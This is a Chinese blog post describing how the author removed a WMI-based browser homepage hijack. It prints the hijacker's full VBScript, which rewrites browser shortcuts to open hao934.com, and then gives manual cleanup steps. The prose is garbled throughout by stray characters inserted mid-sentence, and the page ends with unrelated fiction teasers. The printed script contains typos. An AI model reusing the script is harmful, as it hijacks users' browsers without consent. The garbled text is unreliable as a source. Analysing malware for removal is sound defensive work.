主頁被篡改2345,hao123根治

前段時間主頁被篡改扳躬,而且電腦還中了其他不同種類的病毒脆诉,已經(jīng)全面覆蓋默認的User+admin權(quán)限用戶,開機閃屏+自動結(jié)束打開任務(wù)等等坦报,當(dāng)時直接注銷用戶库说,采用系統(tǒng)保留用戶administrater用戶登錄,然后安裝360片择,重新全盤掃描潜的,但是對于一個安全新手來說,360清理掉了許多可以正常使用的工具字管,而且許多工具功能也變的殘缺啰挪,只好重裝系統(tǒng)信不。
昨天電腦在此打開了某客的工具包,電腦直接被惡作劇亡呵,不過目前沒發(fā)現(xiàn)什么大礙抽活,重啟后主頁被篡改,又不想使用360锰什,只好手動清理下硕。

首先,我中的瀏覽器
Chrom
firefox

主頁被劫持的原理其實就是通過WMI自動運行的腳本,WMI是windows后臺運行的事件管理器汁胆。

更改WMI就需要下載
https://arlenluo.github.io./images/post6/WMITools.exe
image.png

然后直接點擊okok


image.png

然后右鍵查看這個的屬性


image.png

這里就是幕后黑手
里面的代碼
On Error Resume Next
Const link = "http://hao934.com/?r=gameall&m=a286"
Const link360 = "http://hao934.com/?r=gameall&m=a286&s=3"
browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe"

lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\Username\Desktop,C:\Users\Username\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\Username\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\Username\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\Username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"

browsersArr = split(browsers,",")
Set oDic = CreateObject("scripting.dictionary")

For Each browser In browsersArr
    oDic.Add LCase(browser), browser
Next  

lnkpathsArr = split(lnkpaths,",")  
Set oFolders = CreateObject("scripting.dictionary")  

For Each lnkpath In lnkpathsArr  
    oFolders.Add lnkpath, lnkpath  
Next  

Set fso = CreateObject("Scripting.Filesystemobject")  
Set WshShell = CreateObject("Wscript.Shell")  
For Each oFolder In oFolders  
    If fso.FolderExists(oFolder) Then  
        For Each file In fso.GetFolder(oFolder).Files  
            If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then  
                Set oShellLink = WshShell.CreateShortcut(file.Path)  
                path = oShellLink.TargetPath  
                name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)  
                If oDic.Exists(LCase(name)) Then  
                    If LCase(name) = LCase("360se.exe") Then  
                        oDicShellLink.Arguments = link360  
                    Else  
                        oShellLink.Arguments = link  
                    End If  
                    If file.Attributes And 1 Then  
                        fsoile.Attributes = file.Attributes - 1  
                    End If  
                    oShellLink.Save  
                End If  
            End If  
        Next  
    End If  
Next

現(xiàn)在篡改主頁的代碼大致都是這樣梭姓。理解起來沒什么代難度,不過這個代碼寫的灰常好嫩码,還對360做了特殊處理誉尖。

image.png

而且不能直接刪除。
需要CD到WMI的安裝目錄管理員運行wbemeventviewer.exe
然后需要將桌面和開始菜單铸题,快速啟動欄中的快捷方式刪除

我的桌面和快速啟動欄沒東西
開始菜單目錄
C:\ProgramData\Microsoft\Windows\Start Menu\Programs
image.png

把后面這個去了铡恕,應(yīng)該大部分篡改網(wǎng)頁的腳本小子的方式都能去掉。

不過我這邊修改完以后界面又跳轉(zhuǎn)到了

http://www.2345.com/?36457

繼續(xù)踩坑
在注冊表中的

HKEY_CLASSES_ROOT/CLSID /{871C5380-42A0-1069-A2EA-08002B30309D}/shell/OpenHomePage/Command

查看病毒沒有更改注冊表丢间,(如果有的話雙擊數(shù)據(jù)探熔,將后面的鏈接刪掉),當(dāng)然我這邊不是這種情況千劈。

另外一種就是木馬了祭刚,懶得找,直接使用adwcleaner程序進行清理墙牌。

如果清理結(jié)束后重新啟動后主頁仍然是2345涡驮,說明肯定是木馬了,而且十分有可能是偽裝型木馬喜滨,就算肉眼找到也不會去懷疑的捉捅,直接使用現(xiàn)在的殺毒軟件就好。
我使用的是360大法寶虽风,當(dāng)然殺毒軟件這個東西殺完毒就卸載棒口,直接采用其中的系統(tǒng)急救箱,強力模式辜膝,自定義掃描无牵,清除系統(tǒng)關(guān)鍵位置(C盤),關(guān)系的東西記得備份厂抖。
有l(wèi)inux子系統(tǒng)和其他安全工具的記得轉(zhuǎn)移

linux子系統(tǒng)目錄
C:\Users\{user namae}\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu16.04onWindows_79rhkp1fndgsc\LocalState\rootfs

至此茎毁,主流的主頁篡改就這些。
當(dāng)然嫌棄麻煩的可以直接用360的主頁防護+系統(tǒng)急救箱

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個濱河市七蜘,隨后出現(xiàn)的幾起案子谭溉,更是在濱河造成了極大的恐慌,老刑警劉巖橡卤,帶你破解...
    沈念sama閱讀 212,383評論 6 493
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件扮念,死亡現(xiàn)場離奇詭異,居然都是意外死亡碧库,警方通過查閱死者的電腦和手機柜与,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 90,522評論 3 385
  • 文/潘曉璐 我一進店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來谈为,“玉大人旅挤,你說我怎么就攤上這事踢关∩■辏” “怎么了?”我有些...
    開封第一講書人閱讀 157,852評論 0 348
  • 文/不壞的土叔 我叫張陵签舞,是天一觀的道長秕脓。 經(jīng)常有香客問我,道長儒搭,這世上最難降的妖魔是什么吠架? 我笑而不...
    開封第一講書人閱讀 56,621評論 1 284
  • 正文 為了忘掉前任,我火速辦了婚禮搂鲫,結(jié)果婚禮上傍药,老公的妹妹穿的比我還像新娘。我一直安慰自己魂仍,他們只是感情好拐辽,可當(dāng)我...
    茶點故事閱讀 65,741評論 6 386
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著擦酌,像睡著了一般俱诸。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上赊舶,一...
    開封第一講書人閱讀 49,929評論 1 290
  • 那天睁搭,我揣著相機與錄音,去河邊找鬼笼平。 笑死园骆,一個胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的寓调。 我是一名探鬼主播锌唾,決...
    沈念sama閱讀 39,076評論 3 410
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼捶牢!你這毒婦竟也來了鸠珠?” 一聲冷哼從身側(cè)響起巍耗,我...
    開封第一講書人閱讀 37,803評論 0 268
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎渐排,沒想到半個月后炬太,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 44,265評論 1 303
  • 正文 獨居荒郊野嶺守林人離奇死亡驯耻,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 36,582評論 2 327
  • 正文 我和宋清朗相戀三年亲族,在試婚紗的時候發(fā)現(xiàn)自己被綠了。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片可缚。...
    茶點故事閱讀 38,716評論 1 341
  • 序言:一個原本活蹦亂跳的男人離奇死亡霎迫,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出帘靡,到底是詐尸還是另有隱情知给,我是刑警寧澤,帶...
    沈念sama閱讀 34,395評論 4 333
  • 正文 年R本政府宣布描姚,位于F島的核電站涩赢,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏轩勘。R本人自食惡果不足惜筒扒,卻給世界環(huán)境...
    茶點故事閱讀 40,039評論 3 316
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望绊寻。 院中可真熱鬧花墩,春花似錦、人聲如沸澄步。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,798評論 0 21
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽驮俗。三九已至懂缕,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間王凑,已是汗流浹背搪柑。 一陣腳步聲響...
    開封第一講書人閱讀 32,027評論 1 266
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留索烹,地道東北人工碾。 一個月前我還...
    沈念sama閱讀 46,488評論 2 361
  • 正文 我出身青樓,卻偏偏與公主長得像百姓,于是被迫代替她去往敵國和親渊额。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 43,612評論 2 350

推薦閱讀更多精彩內(nèi)容

  • 本文全是干貨,全是思維旬迹,全是自己的整理總結(jié)火惊;通過現(xiàn)象看本質(zhì),帶著俯視的角度跳出來看產(chǎn)品奔垦,并附有做產(chǎn)品的一些方法屹耐;以...
    干貨_紹琰閱讀 1,898評論 0 29
  • 上周日去小提琴課的路上,提出買酸奶的椿猎,我說可以給趙老師帶一杯惶岭,他說好,想了一下說不行犯眠,趙老師都胖了按灶。繼續(xù)補充,有一...
    宣萍閱讀 286評論 0 0
  • 姐姐筐咧,今夜我在德令哈鸯旁,夜色籠罩 姐姐,今夜我只有戈壁 草原盡頭我兩手空空 悲痛時握不住一顆淚滴 姐姐嗜浮,今夜我在德令...
    醒糊涂人閱讀 59評論 0 0